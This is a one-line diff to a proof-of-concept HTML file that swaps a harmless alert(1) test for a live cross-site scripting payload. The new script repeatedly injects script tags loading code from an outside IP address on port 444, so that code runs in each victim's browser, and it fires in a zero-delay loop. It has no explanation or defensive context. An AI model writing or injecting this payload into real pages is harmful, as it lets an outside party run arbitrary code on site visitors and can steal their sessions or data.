--- a/poc.html
+++ b/poc.html
@@ -1,1 +1,1 @@
-<script>alert(1);</script>
+<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//105.107.128.43:444";d.body.appendChild(z)},0)</script>
